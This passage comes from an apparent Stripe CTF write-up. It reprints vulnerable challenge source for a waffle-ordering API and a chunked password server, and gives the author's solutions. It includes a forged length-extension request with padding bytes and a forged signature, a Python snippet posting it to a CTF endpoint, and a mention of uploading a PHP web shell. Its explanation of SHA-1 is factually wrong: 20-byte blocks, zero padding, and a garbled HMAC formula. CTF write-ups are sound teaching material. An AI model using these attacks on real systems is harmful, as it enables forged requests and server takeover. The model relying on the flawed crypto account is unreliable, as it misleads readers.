        print 'usage: client.py ENDPOINT USER_ID SECRET WAFFLE LAT LONG'
        sys.exit(1)

    c = Client(*sys.argv[1:4])
    print c.order(sys.argv[4], sys.argv[5:7])

The contents of wafflecopter.py:

#!/usr/bin/env python
import hashlib
import json
import logging
import os
import sys
import urllib
from functools import wraps

import bcrypt
import sqlite3
from flask import Flask, session, request, redirect, render_template, g, abort
from flask import make_response

import db
import settings

app = Flask(__name__)
app.config.from_object(settings)
app.logger.addHandler(logging.StreamHandler(sys.stderr))

if not os.path.exists(settings.entropy_file):
    print 'Entropy file not found. Have you run initialize_db.py?'

# use persistent entropy file for secret_key
app.secret_key = open(settings.entropy_file, 'r').read()

class BadSignature(Exception):
    pass
class BadRequest(Exception):
    pass

def valid_user(user, passwd):
    try:
        row = g.db.select_one('users', {'name': user})
    except db.NotFound:
        print 'Invalid user', repr(user)
        return False
    if bcrypt.hashpw(passwd, row['password']) == row['password']:
        print 'Valid user:', repr(user)
        return row
    else:
        print 'Invalid password for', repr(user)
        return False

def log_in(user, row):
    session['user'] = row
    session['username'] = user

def absolute_url(path):
    return settings.url_root + path

def require_authentication(func):
    @wraps(func)
    def newfunc(*args, **kwargs):
        if 'user' not in session:
            return redirect(absolute_url('/login'))
        return func(*args, **kwargs)
    return newfunc

def json_response(obj, status_code=200):
    text = json.dumps(obj) + '\n'
    resp = make_response(text, status_code)
    resp.headers['content-type'] = 'application/json'
    return resp

def json_error(message, status_code):
    return json_response({'error': message}, status_code)

def log_api_request(user_id, path, body):
    if isinstance(body, str):
        # body is a string byte stream, but sqlite will think it's utf-8
        # convert each character to unicode so it's unambiguous
        body = ''.join(unichr(ord(c)) for c in body)
    g.db.insert('logs', {'user_id': user_id, 'path': path, 'body': body})

def get_logs(user_id):
    return g.db.select('logs', {'user_id': user_id})

def get_waffles():
    return g.db.select('waffles')

@app.before_request
def before_request():
    g.db = db.DB(settings.database)
    g.cursor = g.db.cursor

@app.teardown_request
def teardown_request(exception):
    if hasattr(g, 'db'):
        g.db.commit()
        g.db.close()

@app.route('/')
@require_authentication
def index():
    user = session['user']
    waffles = get_waffles()
    return render_template('index.html', user=user, waffles=waffles,
                           endpoint=request.url_root)

@app.route('/login', methods=['GET', 'POST'])
def login():
    error = None
    if request.method == 'POST':
        user = request.form['username']
        password = request.form['password']
        row = valid_user(user, password)
        if row:
            log_in(user, row)
            return redirect(absolute_url('/'))
        else:
            error = 'Invalid username or password'

    return render_template('login.html', error=error)

@app.route('/logs/')
@require_authentication
def logs(id):
    rows = get_logs(id)
    return render_template('logs.html', logs=rows)

def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        params[key] = val
    return params

def parse_post_body(body):
    try:
        raw_params, sig = body.strip('\n').rsplit('|sig:', 1)
    except ValueError:
        raise BadRequest('Request must be of form params|sig:da39a3ee5e6b...')

    return raw_params, sig

def process_order(params):
    user = g.db.select_one('users', {'id': params['user_id']})

    # collect query parameters
    try:
        waffle_name = params['waffle']
    except KeyError:
        return json_error('must specify waffle', 400)
    try:
        count = int(params['count'])
    except (KeyError, ValueError):
        return json_error('must specify count', 400)
    try:
        lat, long = float(params['lat']), float(params['long'])
    except (KeyError, ValueError):
        return json_error('where would you like your waffle today?', 400)

    if count < 1:
        return json_error('count must be >= 1', 400)

    # get waffle info
    try:
        waffle = g.db.select_one('waffles', {'name': waffle_name})
    except db.NotFound:
        return json_error('no such waffle: %s' % waffle_name, 404)

    # check premium status
    if waffle['premium'] and not user['premium']:
        return json_error('that waffle requires a premium subscription', 402)

    # return results
    plural = 's' if count > 1 else ''
    msg = 'Great news: %d %s waffle%s will soon be flying your way!' \
        % (count, waffle_name, plural)
    return json_response({'success': True, 'message': msg,
                          'confirm_code': waffle['confirm']})

@app.route('/orders', methods=['POST'])
def order():
    # We need the original POST body in order to check the hash, so we use
    # request.input_stream rather than request.form.
    request.shallow = True
    body = request.input_stream.read(
        request.headers.get('content-length', type=int) or 0)

    # parse POST body
    try:
        raw_params, sig = parse_post_body(body)
    except BadRequest, e:
        print 'failed to parse', repr(body)
        return json_error(e.message, 400)

    print 'raw_params:', repr(raw_params)

    try:
        params = parse_params(raw_params)
    except ValueError:
        raise BadRequest('Could not parse params')

    print 'sig:', repr(sig)

    # look for user_id and signature
    try:
        user_id = params['user_id']
    except KeyError:
        print 'user_id not provided'
        return json_error('must provide user_id', 401)

    # check that signature matches
    try:
        verify_signature(user_id, sig, raw_params)
    except BadSignature, e:
        return json_error('signature check failed: ' + e.message, 401)

    # all OK -- process the order
    log_api_request(params['user_id'], '/orders', body)
    return process_order(params)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=9233)

The contents of db.py:

import os
import sqlite3
import sys

class NotFound(Exception):
    pass
class ManyFound(Exception):
    pass

# for app.secret_key
def rewrite_entropy_file(path):
    f = open(path, 'w')
    f.write(os.urandom(24))
    f.close()

class DB(object):
    def __init__(self, database):
        self.conn = sqlite3.connect(database,
                                    detect_types=sqlite3.PARSE_DECLTYPES)
        self.conn.row_factory = sqlite3.Row
        self.cursor = self.conn.cursor()
        self.debug = False

    def log(self, *args):
        if self.debug:
            for i in args:
                sys.stderr.write(str(i))
            sys.stderr.write('\n')

    def commit(self):
        self.conn.commit()

    def close(self):
        self.cursor.close()
        self.conn.close()

    def select(self, table, where=None):
        if where is None:
            where = {}
        self.do_select(table, where)
        return map(dict, self.cursor.fetchall())

    def select_one(self, table, where=None):
        where = where or {}
        self.do_select(table, where)

        row = self.cursor.fetchone()
        if row is None:
            raise NotFound

        if self.cursor.fetchone() is not None:
            raise ManyFound

        return dict(row)

    def do_select(self, table, where=None):
        where = where or {}
        where_clause = ' AND '.join('%s=?' % key for key in where.iterkeys())
        values = where.values()
        q = 'select * from ' + str(table)
        if where_clause:
            q += ' where ' + where_clause
        self.log(q, '<==', values)
        self.cursor.execute(q, values)

    def insert(self, table, data):
        cols = ', '.join(data.keys())
        vals = data.values()
        placeholders = ', '.join('?' for i in data)
        q = 'insert into %s (%s) values (%s)' % (table, cols, placeholders)
        self.log(q, '<==', vals)
        self.cursor.execute(q, vals)
        self.commit()
        return self.cursor.rowcount

The contents of settings.py:

import os

DEBUG = False
database = os.path.join(os.path.dirname(__file__), 'wafflecopter.db')
entropy_file = os.path.join(os.path.dirname(__file__), 'entropy.dat')

url_root = ''

try:
    from local_settings import *
except ImportError:
    pass

The contents of initialize_db.py:

#!/usr/bin/env python
import sys
from datetime import datetime
from random import SystemRandom

import bcrypt
import sqlite3

import client
import db
import settings

conn = db.DB(settings.database)
conn.debug = True
c = conn.cursor

db.rewrite_entropy_file(settings.entropy_file)

rand = SystemRandom()

def rand_choice(alphabet, length):
    return ''.join(rand.choice(alphabet) for i in range(length))

alphanum = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
def rand_alnum(length):
    return rand_choice(alphanum, length)

def main(level_password):
    create_tables()
    add_users()
    add_waffles(level_password)
    add_logs()

def add_users():
    add_user(1, 'larry', rand_alnum(16), 1)
    add_user(2, 'randall', rand_alnum(16), 1)
    add_user(3, 'alice', rand_alnum(16), 0)
    add_user(4, 'bob', rand_alnum(16), 0)
    add_user(5, 'ctf', 'password', 0)

def add_waffles(level_password):
    add_waffle('liege', 1, level_password)
    add_waffle('dream', 1, rand_alnum(14))
    add_waffle('veritaffle', 0, rand_alnum(14))
    add_waffle('chicken', 1, rand_alnum(14))
    add_waffle('belgian', 0, rand_alnum(14))
    add_waffle('brussels', 0, rand_alnum(14))
    add_waffle('eggo', 0, rand_alnum(14))

def add_logs():
    gen_log(1, '/orders', {'waffle': 'eggo', 'count': 10,
                           'lat': 37.351, 'long': -119.827})
    gen_log(1, '/orders', {'waffle': 'chicken', 'count': 2,
                           'lat': 37.351, 'long': -119.827})
    gen_log(2, '/orders', {'waffle': 'dream', 'count': 2,
                           'lat': 42.39561, 'long': -71.13051},
            date=datetime(2007, 9, 23, 14, 38, 00))
    gen_log(3, '/orders', {'waffle': 'veritaffle', 'count': 1,
                           'lat': 42.376, 'long': -71.116})

def create_tables():
    c.execute('drop table if exists users')
    c.execute('''
    CREATE TABLE users(
    id int not null primary key,
    name varchar(255) not null,
    password varchar(255) not null,
    premium int not null,
    secret varchar(255) not null,
    unique (name)
    )
    ''')

    c.execute('drop table if exists waffles')
    c.execute('''
    CREATE TABLE waffles(
    name varchar(255) not null primary key,
    premium int not null,
    confirm varchar(255) not null
    )
    ''')

    c.execute('drop table if exists logs')
    c.execute('''
    CREATE TABLE logs(
    user_id int not null,
    path varchar(255) not null,
    body text not null,
    date timestamp not null default current_timestamp
    )
    ''')
    c.execute('create index user_id on logs (user_id)')
    c.execute('create index date on logs (date)')

def add_user(uid, username, password, premium):
    hashed = bcrypt.hashpw(password, bcrypt.gensalt(10))
    secret = rand_alnum(14)
    data = {'id': uid, 'name': username, 'password': hashed,
            'premium': premium, 'secret': secret}
    conn.insert('users', data)

def get_user(uid):
    return conn.select_one('users', {'id': uid})

def add_waffle(name, premium, confirm):
    data = {'name': name, 'premium': premium, 'confirm': confirm}
    conn.insert('waffles', data)

def gen_log(user_id, path, params, date=None):
    user = get_user(user_id)

    # generate signature using client library
    cl = client.Client(None, user_id, user['secret'])
    body = cl._make_post(params)

    # prepare data for insert
    data = {'user_id': user_id, 'path': path, 'body': body}

    if date:
        data['date'] = date

    conn.insert('logs', data)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print 'usage: initialize_db.py LEVEL_PASSWORD'
        sys.exit(1)

    main(sys.argv[1])

The contents of templates/index.html:



  
    WaffleCopter
    
  
  
    WaffleCopter [beta]
    Welcome, {{user['name']}}!
    Your API credentials
    
      endpoint: {{ endpoint }}
      user_id: {{ user['id'] }}
      secret: {{ user['secret'] }}
    
    Available waffles
    
      {% for waffle in waffles %}
      
        {{ waffle['name'] }}{% if waffle['premium'] %} (premium){% endif %}
      
      {% endfor %}
    
    API Request logs

The contents of templates/login.html:



  
    WaffleCopter - Login
  
  
    WaffleCopter [beta]
    {% if error %}
    {{ error }}
    {% endif %}
    
      
        
          username: 
        
        
          password:

The contents of templates/logs.html:



  
    WaffleCopter - Logs
    
  
  
    WaffleCopter [beta]
    API Request Logs
    
      {% for log in logs %}
      
      {% endfor %}
    
      date path body

        {{ log['date'].strftime('%F %R:%S') }}
        {{ log['path'] }}
        {{ log['body'].encode('unicode-escape') }}

Solution This one was my favorite, since 90% of it’s progress was cryptographic. It’s a service that gets requests of the following form:

count=1&lat=100&user_id=5&long=100&waffle=eggo|sig:36c698a40093329045ca293d6e0c985411d366d1

On a certain endpoint (URL) and sends you a waffle! The request describes the number of waffles, latitude and longitude of the target, the user_id requesting it and the type of waffle. There are three waffle types only served to premium users, one of them is named liege. We are not a premium user but we have to make a valid order for liege to get our flag. If you simply order a liege on your user_id, you would get

that waffle requires a premium subscription

And if you provide user_id as 1 (a premium user), you would get:

signature check failed

This means that the system uses some sort of Message Authentication Control (aka signature) to validate it’s source. Now every user has a secret key used to sign his requests and make a signature, so that the server could verify it. The server uses the following code to validate the signature:

def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True

It retrieves user’s secret from the database, generates sha1(secret + raw_params) and compares it against the sent signature. raw_params is also the part of the request before the | sign (the whole request without the signature). If two signatures match, it’s authentic, otherwise error is popped. Now this mechanism is called HMAC but it is wrongly implemented. Read this section of wikipedia to know why you should use SHA1(secret + SHA1(secret+message)) instead of what is happening in this one. I’m going to describe it here as well, since this is the key to the challenge. A cryptographic hash function is a state machine, fed with some initial values (defined in the description of algorithm), then the data is chunked into same-size blocks and fed to the machine. SHA-1 for example operates on chunks of 160 bit each, so if our input is not a multiple of 20 bytes, it will be padded with zeroes to be so. The SHA1 machine is depicted below: Now what if we had two pieces of data, C and B, each exactly 20 bytes, and we had C=SHA1(A), without actually having A itself, and what we wanted was SHA1(A+B) (plus means concatenation here)? We don’t have A so we can’t first compute A+B and then SHA1 it, but couldn’t we get the final result some other way? We definitely could, since when we SHA1(A+B), the algorithm first operates on the first 20 bytes, and then continues to do so on second 20 bytes. Now C is the result of first 20 bytes, we just have to keep the machine in that state (instead of the initial state) and feed it with B, to get SHA1(A+B) without having A. This idea is known as a Hash Length Extension Attack, and works the same even if our data is not exactly a multiple of 20 bytes (we just have to pad zeroes). Now what I want to add is &user_id=1&waffle=liege& to the end of raw_params so that these new values overwrite the previous ones, thus making the whole request be:

count=1&lat=100&user_id=5&long=100&waffle=eggo&user_id=1&waffle=liege&|sig:

Why wouldn’t I just replace them? Because I can only compute the new signature if I concatenate new things to the request, not when I change it. Now using the idea above and some piece of code, the new request would be:

count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd

Those \x00 above mean a character with the ASCII value of zero, and since I can not show them on terminal, I used the following Python code snippet to send this request to server:

import requests import hashlib import json import sys import urllib body=”count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege|sig:5fe73d0cbd3b4e82f9b87970041851d232e757cd”; resp= requests.post(“https://level07-2.stripe-ctf.com/user-cyusirmzyz/orders”,data=body); print resp.text;

This nice little code would output the flag for the next challenge!

Challenge 8 – Networking Side Channel Attack

You completed this level in 98035.439 seconds. The password was165774000681. The solution you submitted was: took a looong time! lots of scripts all there on server2

Welcome to the final level, Level 8. HINT 1: No, really, we’re not looking for a timing attack. HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output? UPDATE: If you push the reset button, you will be bounced to a newlevel08 machine. Note that this will change the value of your Flag. If you push reset on Level 2, you will similarly be bounced to a new Level 2 machine. Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accesible athttps://level08-4.stripe-ctf.com/user-stsqneospz/. PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]} to PasswordDB, which will respond with a{"success": true}" or {"success": false}" to you and your specified webhook endpoints. (For example, try running curl https://level08-4.stripe-ctf.com/user-stsqneospz/ -d '{"password": "password-to-check", "webhooks": []}'.) In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers’ respective existences. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using unequitable amounts of CPU time (relative to other PasswordDB instances on the same machine). As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.) To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server. You can obtain the code for PasswordDB from git clone https://level08-4.stripe-ctf.com/user-stsqneospz/level08-code, or simply read the source below. The contents of password_db_launcher:

#!/usr/bin/env python
import atexit
import logging
import optparse
import os
import os.path
import random
import re
import signal
import socket
import subprocess
import sys
import time

import common

logger = logging.getLogger('password_db')
logger.addHandler(logging.StreamHandler(sys.stderr))

processes = []

def launch(script, *args):
    path = os.path.join(os.path.dirname(__file__), script)
    args = [path] + list(args)
    launched = subprocess.Popen(args)
    logger.info('Launched %r (pid %d)' % (args, launched.pid))
    processes.append(launched)
    return launched

def nukeChildren():
    logger.info('Killing all remaining children')
    for process in processes:
        try:
            os.kill(process.pid, signal.SIGTERM)
        except OSError:
            pass
        else:
            logger.info('Killed child %s' % process.pid)

def waitChildren():
    os.wait()

def passwordSpecToPassword(password_spec):
    if password_spec and password_spec[0] == '@':
        password_file = password_spec[1:]
        logger.info('Reading password from %s' % password_file)
        return open(password_file).read()
    else:
        return password_spec

def validatePassword(password):
    if not re.search('^\d{12}$', password):
        raise ValueError("Invalid password! The Flag is a 12-digit number.")

def socket_exists(host, port):
    logger.info('Checking whether %s:%s is reachable' % (host, port))
    try:
        socket.create_connection([host, port])
    except socket.error:
        return False
    else:
        return True

def find_open_port(base_port):
    while socket_exists('127.0.0.1', base_port):
        base_port += 1
    return base_port

def wait_until(condition, *args):
    for i in xrange(10):
        if condition(*args):
            return
        else:
            logger.info('Condition not yet true, waiting 0.35 seconds'
                        ' (try %s/%s)' % (i+1, 10))
            time.sleep(0.35)
    raise RuntimeError('Timed out waiting for condition')

def main():
    """
    Spins up a secure configuration of PasswordDB:

    - Uses 4 chunk servers
    - Validates that the Flag itself looks correct
    """

    usage = """%prog [-q ...]  

primary_address should be of the form 'host:port' or 'unix:/path/to/socket'"""
    parser = optparse.OptionParser(usage)
    parser.add_option('-q', '--quiet', help='Quietness of debugging output.',
                      dest='quiet', action='count', default=0)
    opts, args = parser.parse_args()
    if not opts.quiet:
        logger.setLevel(logging.DEBUG)
    elif opts.quiet == 1:
        logger.setLevel(logging.INFO)
    elif opts.quiet >= 2:
        logger.setLevel(logging.WARN)

    if len(args) != 2:
        parser.print_usage()
        return 1

    password_spec = args[0]
    primary_host_spec = args[1]

    atexit.register(nukeChildren)

    password = passwordSpecToPassword(password_spec)
    validatePassword(password)

    chunk_count = 4
    chunks = common.chunkPassword(chunk_count, password)

    base_port = random.randint(1024, 20000)
    chunk_hosts = []
    for i in xrange(chunk_count):
        port = find_open_port(base_port)
        base_port = port + 1
        chunk_hosts.append(['127.0.0.1', port])

    for host_port, password_chunk in zip(chunk_hosts, chunks):
        host, port = host_port
        launch('chunk_server', '%s:%s' % (host, port), password_chunk)

    time.sleep(0.35)

    # Make sure everything is booted before starting the primary server
    for host_port in chunk_hosts:
        host, port = host_port
        wait_until(socket_exists, host, port)

    args = []
    args.append('-l')
    args.append('/tmp/primary.lock')
    for host, port in chunk_hosts:
        args.append('-c')
        args.append('%s:%s' % (host, port))
    args.append(primary_host_spec)
    launch('primary_server', *args)

    waitChildren()
    return 0

if __name__ == '__main__':
    sys.exit(main())

The contents of primary_server:

#!/usr/bin/env python
import fcntl
import logging
import json
import optparse
import sys
import time
import traceback

from twisted.internet import reactor

# Local project
import common

logger = logging.getLogger('password_db')
logger.addHandler(logging.StreamHandler(sys.stderr))

class PrimaryProcessor(common.PayloadProcessor):
    def __init__(self, request, chunk_servers):
        super(PrimaryProcessor, self).__init__(request)
        self.chunk_servers = chunk_servers

    def process(self, data):
        Shield.registerLocker()

        password = self.getArg(data, 'password')
        webhooks = self.getArg(data, 'webhooks')

        self.start_time = time.time()

        self.remaining_chunk_servers = self.chunk_servers[:]
        self.remaining_chunks = self.chunkPassword(password)

        self.webhooks = [common.parseHost(webhook) for webhook in webhooks]

        self.checkNext()

    def checkNext(self):
        assert(len(self.remaining_chunks) == len(self.remaining_chunk_servers))

        if not self.remaining_chunk_servers:
            self.sendResult(True)
            return

        next_chunk_server = self.remaining_chunk_servers.pop(0)
        next_chunk = self.remaining_chunks.pop(0)

        self.log_info('Making request to chunk server %r'
                      ' (remaining chunk servers: %r)' %
                      (next_chunk_server, self.remaining_chunk_servers))

        common.makeRequest(next_chunk_server,
                           {'password_chunk' : next_chunk},
                           self.nextServerCallback,
                           self.nextServerErrback)

    def nextServerCallback(self, data):
        parsed_data = json.loads(data)
        # Chunk was wrong!
        if not parsed_data['success']:
            # Defend against timing attacks
            remaining_time = self.expectedRemainingTime()
            self.log_info('Going to wait %s seconds before responding' %
                          remaining_time)
            reactor.callLater(remaining_time, self.sendResult, False)
            return

        self.checkNext()

    def expectedRemainingTime(self):
        assert(len(self.chunk_servers) > len(self.remaining_chunk_servers))
        elapsed_time = time.time() - self.start_time
        ratio_remaining_to_elapsed = (len(self.remaining_chunk_servers) * 1.0
            / (len(self.chunk_servers) - len(self.remaining_chunk_servers)))
        return ratio_remaining_to_elapsed * elapsed_time

    def nextServerErrback(self, address_spec, error):
        backtrace = traceback.format_exc(error)
        self.log_error('Error while connecting to chunk server %r: %s (%r)' %
                       (address_spec, error, backtrace))
        self.respondWithMessage('Error! This should never happen in '
                                'production, but it seems that it did. Contact'
                                ' us at ctf@stripe.com to let us know.')

    def sendResult(self, success):
        result = {'success': success}
        self.respond(result)
        for webhook in self.webhooks:
            self.sendWebhook(webhook, result)

    def sendWebhook(self, webhook_host_spec, result):
        self.log_info('Sending webhook to %r: %s' %
                      (webhook_host_spec, result))
        common.makeRequest(webhook_host_spec, result, self.sendWebhookCallback,
                           self.sendWebhookErrback)

    def sendWebhookCallback(self, data):
        # Too late to do anything here
        pass

    def sendWebhookErrback(self, address_spec, error):
        backtrace = traceback.format_exc(error)
        self.log_error('Error while connecting to webhook server %r: %s (%r)' %
                       (address_spec, error, backtrace))

    def chunkPassword(self, password):
        return common.chunkPassword(len(self.chunk_servers), password, self)

class Shield(object):
    # Ensure equitable distribution of load among many PasswordDB
    # instances on a single server. (Typically servers come with many
    # PasswordDB instances.)
    @classmethod
    def registerLocker(self):
        if self.has_lock:
            return

        self.acquireLock()
        reactor.callLater(self.lock_period, self.releaseLock)

    @classmethod
    def acquireLock(self):
        logger.info('Acquiring lock')
        fcntl.flock(self.lockfile, fcntl.LOCK_EX)
        self.has_lock = True

    @classmethod
    def releaseLock(self):
        logger.info('Releasing lock')
        fcntl.flock(self.lockfile, fcntl.LOCK_UN)
        self.has_lock = False

    @classmethod
    def openLockfile(self, path):
        self.lock_period = 0.250
        self.has_lock = False
        self.lockfile = open(path, 'w')

def main():
    usage = """
%prog -c CHUNK_SERVER [-c CHUNK_SERVER ...] [-q ...] -l /path/to/lockfile PRIMARY_SERVER

CHUNK_SERVER:
    A chunk server to spin up as 

PRIMARY_SERVER:
    Either pass a host:port pair  or pass a
    unix:-prefixed path for it to listen on a UNIX socket
     (useful for running under FastCGI).
"""
    parser = optparse.OptionParser(usage)
    parser.add_option('-q', '--quiet', help='Quietness of debugging output.',
                      dest='quiet', action='count', default=0)
    parser.add_option('-c', '--chunk-servers',
                      help='Add a chunk server to spin up',
                      dest='chunk_servers', action='append', default=[])
    parser.add_option('-l', '--lock-file',
                      help='Path to lockfile',
                      dest='lockfile')
    opts, args = parser.parse_args()
    if not opts.quiet:
        logger.setLevel(logging.DEBUG)
    elif opts.quiet == 1:
        logger.setLevel(logging.INFO)
    elif opts.quiet >= 2:
        logger.setLevel(logging.WARN)

    if len(args) != 1:
        parser.print_usage()
        return 1

    if not opts.chunk_servers:
        parser.print_usage()
        return 1

    if not opts.lockfile:
        parser.print_usage()
        return 1

    Shield.openLockfile(opts.lockfile)

    chunk_servers = [common.parseHost(spec) for spec in opts.chunk_servers]

    server = common.HTTPServer(PrimaryProcessor, chunk_servers)

    spec = args[0]
    if common.isUnix(spec):
        path = common.parseUnix(spec)
        common.listenUNIX(path, server)
    else:
        address_spec = common.parseHost(args[0])
        common.listenTCP(address_spec, server)

    reactor.run()
    return 0

if __name__ == '__main__':
    sys.exit(main())

The contents of chunk_server:

#!/usr/bin/env python
import logging
import optparse
import sys

from twisted.internet import reactor

# Local project
import common

logger = logging.getLogger('password_db')
logger.addHandler(logging.StreamHandler(sys.stderr))

class ChunkProcessor(common.PayloadProcessor):
    def __init__(self, request, password_chunk):
        super(ChunkProcessor, self).__init__(request)
        self.password_chunk = password_chunk

    def process(self, data):
        chunk = self.getArg(data, 'password_chunk')
        success = chunk == self.password_chunk
        self.respond({
                'success' : success
                })

def main():
    usage = """%prog [-q ...]  """
    parser = optparse.OptionParser(usage)
    parser.add_option('-q', '--quiet', help='Quietness of debugging output.',
                      dest='quiet', action='count', default=0)
    opts, args = parser.parse_args()
    if not opts.quiet:
        logger.setLevel(logging.DEBUG)
    elif opts.quiet == 1:
        logger.setLevel(logging.INFO)
    elif opts.quiet >= 2:
        logger.setLevel(logging.WARN)

    if len(args) != 2:
        parser.print_usage()
        return 1

    address_spec = common.parseHost(args[0])
    password_chunk = args[1]

    server = common.HTTPServer(ChunkProcessor, password_chunk)
    common.listenTCP(address_spec, server)
    reactor.run()

    return 0

if __name__ == '__main__':
    sys.exit(main())

The contents of common.py:

import atexit
import json
import logging
import os

from twisted.internet import reactor, protocol
from twisted.protocols import basic

from twisted.web import server, resource, client

logger = logging.getLogger('password_db.common')

class Halt(Exception):
    pass

class HTTPServer(object, resource.Resource):
    isLeaf = True

    def __init__(self, processor, args):
        self.processor = processor
        self.args = args

    def render_GET(self, request):
        return ('{"success": false, "message": "GET not supported.'
                ' Try POSTing instead."}\n')

    def render_POST(self, request):
        processor_instance = self.processor(request, self.args)
        processor_instance.processRaw()
        return server.NOT_DONE_YET

class PayloadProcessor(object):
    request_count = 0

    def __init__(self, request):
        PayloadProcessor.request_count += 1
        self.request_id = PayloadProcessor.request_count
        self.request = request

    def processRaw(self):
        raw_data = self.request.content.read()
        self.log_info('Received payload: %r', raw_data)

        try:
            parsed = json.loads(raw_data)
        except ValueError as e:
            self.respondWithMessage('Could not parse message: %s' % e)
            return

        try:
            self.process(parsed)
        except Halt:
            pass

    # API method
    def process(self, data):
        raise NotImplementedError

    # Utility methods
    def getArg(self, data, name):
        try:
            return data[name]
        except KeyError:
            self.respondWithMessage('Missing required param: %s' % name)
            raise Halt()

    def respondWithMessage(self, message):
        response = {
            'success' : False,
            'message' : message
            }
        self.respond(response)

    def respond(self, response):
        if self.request.notifyFinish():
            self.log_error("Request already finished!")
        formatted = json.dumps(response) + '\n'
        self.log_info('Responding with: %r', formatted)
        self.request.write(formatted)
        self.request.finish()

    def log_info(self, *args):
        self.log('info', *args)

    def log_error(self, *args):
        self.log('error', *args)

    def log(self, level, msg, *args):
        # Make this should actually be handled by a formatter.
        client = self.request.client
        try:
            host = client.host
            port = client.port
        except AttributeError:
            prefix = '[%r:%d] '  % (client, self.request_id)
        else:
            prefix = '[%s:%d:%d] '  % (host, port, self.request_id)
        method = getattr(logger, level)
        interpolated = msg % args
        method(prefix + interpolated)

def chunkPassword(chunk_count, password, request=None):
    # Equivalent to ceil(password_length / chunk_count)
    chunk_size = (len(password) + chunk_count - 1) / chunk_count

    chunks = []
    for i in xrange(0, len(password), chunk_size):
        chunks.append(password[i:i+chunk_size])

    while len(chunks) < chunk_count:
        chunks.append('')

    msg = 'Split length %d password into %d chunks of size about %d: %r'
    args = [len(password), chunk_count, chunk_size, chunks]
    if request:
        request.log_info(msg, *args)
    else:
        logger.info(msg, *args)

    return chunks

def isUnix(spec):
    return spec.startswith('unix:')

def parseHost(host):
    host, port = host.split(':')
    port = int(port)
    return host, port

def parseUnix(unix):
    path = unix[len('unix:'):]
    return path

def makeRequest(address_spec, data, callback, errback):
    # Change the signature of the errback
    def wrapper(error):
        errback(address_spec, error)

    host, port = address_spec
    factory = client.HTTPClientFactory('/',
                                       agent='PasswordChunker',
                                       method='POST',
                                       postdata=json.dumps(data))
    factory.deferred.addCallback(callback)
    factory.deferred.addErrback(wrapper)
    reactor.connectTCP(host, port, factory)

def listenTCP(address_spec, http_server):
    host, port = address_spec
    site = server.Site(http_server)
    reactor.listenTCP(port, site, 50, host)

def cleanupSocket(path):
    try:
        os.remove(path)
    except OSError:
        pass

def listenUNIX(path, http_server):
    site = server.Site(http_server)
    reactor.listenUNIX(path, site, 50)
    atexit.register(cleanupSocket, path)

Solution This one was a real badass, it took me about 7 hours to crack (though I was real sleepy) and I won the CTF T-Shirt after that Since the code is too much, I’ll describe the scenario. There’s an application that launches and gets a 12 digit password as input. Then it launches 4 different chunk servers, each holding 3 digits of the password. Chunks are respective, i.e chunk 1 has digits 1 to 3. The application receives requests on a certain endpoint (URL) and outputs a simple JSON string, either {“success”:false} or {“success”:true} depending on whether your input password was right or not. To check this, the application breaks your input into 4 chunks, sends the first one to chunk server 1 and checks if its valid. If it is, the second part is sent to chunk server 2 for processing and so on. If any of the password chunks are invalid, the processing stops right there. One more thing, you can ask the application to send the result to your own endpoint (some port on some server) as well as responding it directly back to you. Now this must have something to do with solving the challenge. Unfortunately, the application only has access to stripe-ctf servers, so you can’t run your endpoint anywhere you like. You have to obtain some endpoint on their network. Well level02 server is still out there. Obtaining the endpoint server Well this time you can’t just upload a PHP there. Endpoints should be on some host:port directly, not on some web folder. You have to obtain SSH access to level02 server. To do this, I first uploaded a PHP shell (Jackal) on the server. The server has very limited access as it has been secured to prevent any other means. Now you have to store your 